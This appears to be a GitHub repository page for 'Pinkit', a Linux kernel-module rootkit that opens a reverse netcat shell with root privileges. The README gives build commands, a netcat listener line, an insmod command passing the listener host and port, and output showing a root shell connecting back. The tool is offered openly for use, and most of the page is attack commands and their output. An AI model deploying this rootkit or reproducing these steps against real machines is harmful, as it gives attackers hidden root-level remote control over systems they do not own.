Skip to content

A quick LKM rootkit that executes a reverse TCP netcat shell with root privileges.

Notifications You must be signed in to change notification settings

PinkP4nther/Pinkit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

14 Commits
 
 
 
 
 
 

Repository files navigation

# Pinkit
A quick LKM rootkit that executes a reverse netcat shell with root privileges.

INSTALL
[Dependencies]
apt install build-essential linux-headers-$(uname -r)

[Compile Kernel Module]
cd Pinkit; make

[Execute Reverse Shell]
# nc must be installed
nc -lvp 1339 <- Run netcat listener in another shell

[Insert and remove LKM]
[root@Dev Pinkit]# insmod pinkit.ko host="REV_TCP_LH=127.0.0.1" port="REV_TCP_LP=1339"
[root@Dev Pinkit]# cat /proc/modules |grep pink
pinkit 16384 0 - Live 0xffffffffc0aa6000 (PO)
[root@Dev Pinkit]# rmmod pinkit

[Once LKM is loaded shell will connect to nc listener]
[ra_horakhty][Dev][Pinkit]
-> ncat -lvp 1339
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::1339
Ncat: Listening on 0.0.0.0:1339
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:41060.
sh: cannot set terminal process group (-1): Inappropriate ioctl for device
sh: no job control in this shell
sh-4.4# id
id
uid=0(root) gid=0(root) groups=0(root)

Releases

No releases published

Packages

No packages published